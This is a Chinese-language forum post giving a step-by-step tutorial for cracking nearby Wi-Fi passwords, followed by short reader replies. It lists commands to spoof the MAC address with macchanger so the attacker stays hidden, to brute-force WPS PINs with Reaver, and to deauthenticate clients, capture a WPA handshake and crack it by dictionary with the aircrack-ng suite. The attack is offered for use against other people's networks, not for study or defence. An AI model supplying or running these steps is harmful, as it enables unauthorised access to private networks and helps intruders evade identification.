高效破解WiFi密码
摘要:这篇文章将会告诉你如何hack Wi-Fi网络。我使用了一个挺出名的外置wifi网卡(AWUSO36H 802.11 b/g 5db),相信熟悉Wi-Fi hacking的朋友们都应该知道,价格大约20-30刀。使用这块ALFA 卡的主要优势在于他覆盖范围相当广,这样更便于我们获取附近所有的无线接入
这篇文章将会告诉你如何hack Wi-Fi网络。我使用了一个挺出名的外置wifi网卡(AWUSO36H 802.11 b/g 5db),相信熟悉Wi-Fi hacking的朋友们都应该知道,价格大约20-30刀。使用这块ALFA 卡的主要优势在于他覆盖范围相当广,这样更便于我们获取附近所有的无线接入点。http://www.hack6.com/uploads/allimg/120820/09561211H-0.png
市面上有很多工具可以用来hack wifi网络。我将会以两个广泛使用的工具为例:1) Reaver
2) Aircrack
操作系统: Ubuntu 11.04PART 1: 安装【A.安装驱动 】
让我们来看看安装驱动的步骤。将aplha的驱动光盘插入到光驱中,然后打开终端,进入光驱文件夹,输入 “su”然后输入root密码(PS.请确保你的安装过程都是root权限),然后输入以下命令进行驱动安装: #make #make install #reboot
重启机器之后,打开终端输入“iwconfig”,你会看到如下wlan接口
http://www.hack6.com/uploads/allimg/120820/0956123264-1.png
上图中可见,我们这的新接口是wlan1【B.安装MACCHANGER】在攻击者试图hack wifi网络的时候,攻击者最先关心的是如何隐藏自己身份。你可以通过你的aplha卡可以看到mac地址(如:00:AC:CA:11:22:44),或者打开终端输入”ifconfig”来检查HWaddr00 WLAN接口,寻找诸如HWaddr 00:11:22:XX:XX:XX。综上所述,在正式攻击前,现在我们需要修改mac地址。于是我们下载MACCHANGER ,在终端中输入以下命令 #apt-get install macchanger #macchanger –help
如果你看见以下帮助信息,则证明安装成功。
http://www.hack6.com/uploads/allimg/120820/095612NW-2.png
【C. 安装REAVER】下载reaver-1.2.tar.gz,然后开始安装#./configure #make #make install
期间可能会有依赖包#apt-get install libpcap-dev #apt-get install libsqlite3-dev安装完成后,输入reaver验证是否安装完毕。如果出现:Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, CraigHeffner <cheffner@tacnetsol.com> Required Arguments: -i, –interface=<wlan> Name of the monitor-mode interface to use -b, –bssid=<mac> BSSID of the target AP Optional Arguments:则说明安装成功。【D. 安装AIRCRACK】#apt-get install aircrack-nghttp://www.hack6.com/uploads/allimg/120820/095612L21-3.pngPART 2: 使用REAVER Hacking原理简介:Wi-Fi保护设置(WPS)中的这一安全漏洞是由安全研究人员StefanViehbock在2011年年底发现的,目前此漏洞的相应细节也已经被公开发布。黑客和蹭网者可以快速应用这个漏洞破译无线路由器密码。据美国计算机应急响应小组(US-CERT)称,受影响的厂商包括Belkin、Buffalo、D-Link、Linksys(思科)、Netgear、Technicolor、TP-Link和ZyXEL。
http://www.hack6.com/uploads/allimg/120820/095612H92-4.png
Step1:我们首先确定wifi网络中支持wps(Reaver 中可以看到),然后打开终端输入以下命令(wash已随Reaver 安装)#wash -i mon0
http://www.hack6.com/uploads/allimg/120820/0956123a6-5.png
然后打开reaver tool输入#reaver -i mon0 -b ENTER_BSSID_HERE -vv
http://www.hack6.com/uploads/allimg/120820/0956124O3-6.png
整个破解时间(获取WPS PIN, WPA PSK ,and AP ssid)需要大约2-4小时
所以总结来说,使用reaver来hacking wifi网络步骤容易,但是相对比较耗时。PS.在更改 MAC address时,如果报错说wlan1 is busy,尝试输入以下命令 #ifconfig wlan1 down (brings down the interface) #macchanger -A wlan1 (-A this gives a random mac address and manufacturers name) #ifconfig wlan1 up (brings back the wlan1 interface)PART 3: 使用AIRCRACK HackingStep 1: #airmon-ng start wlan1 (puts card in monitoring mode)Step 2:现在我们抓取几个wifi网络#airodump-ng mon0
http://www.hack6.com/uploads/allimg/120820/0956122453-7.png
你可以看到BSSID,ESSID, and CHANNEL以及加密方式。
选择你想破解的BSSIDStep 3: 输入以下命令#airodump-ng -c 1 -w (filename) –bssid (bssid) mon0
http://www.hack6.com/uploads/allimg/120820/095612M43-8.png
如上图,我们已经连接成功了。Step 4: 为了hack 这里的wpa/wpa2/wep,我们需要握手。为了形成握手,我们需要第三方从网络外面连入。#aireplay-ng -0 5 -a (bssid) mon0
http://www.hack6.com/uploads/allimg/120820/0956121640-9.png
Step 5: 现在一个握手包文件已经被创建,我们可以去看抓包结果啦。cirl+c停止step3中的进程,然后在终端中输入:aircrack-ng drag_file_into_terminal
http://www.hack6.com/uploads/allimg/120820/09561261D-10.png
Step 6: 最后输入以下命令进行破解#aircrack-ng -w dictionary_directory handshake_filehttp://www.hack6.com/uploads/allimg/120820/0956124N5-11.png
DOS时代如果使用命令行格式,或许人们还能接受,但现在的“窗口”时代,除了哪些真正的熟知电脑的人外,多数小白是看不懂的,现在还有多少人知道那17个dos的内部命令,更不要说linux这种小众操作系统下更繁琐的命令格式,不知道是时代进步还是退步{:5_254:},但往往灵活性最高的还是越接近底层操作, 谢谢分享。真心话! 楼主想表达什么意思 楼主,出太空仓时注意,外面乱石会飞奔而来 不就是抓包跑包嘛,搞得这么花哨!呵呵呵;P 不久抓个包吗 至于不你是外星来的吧 hoho,小学时候就会跑包了好不好的呀!;P 还是跑包。呵呵 太复杂了 命令行格式 这个跟水滴类抓包跑包的有什么区别?像以前跑包那样的就沒有什么用了!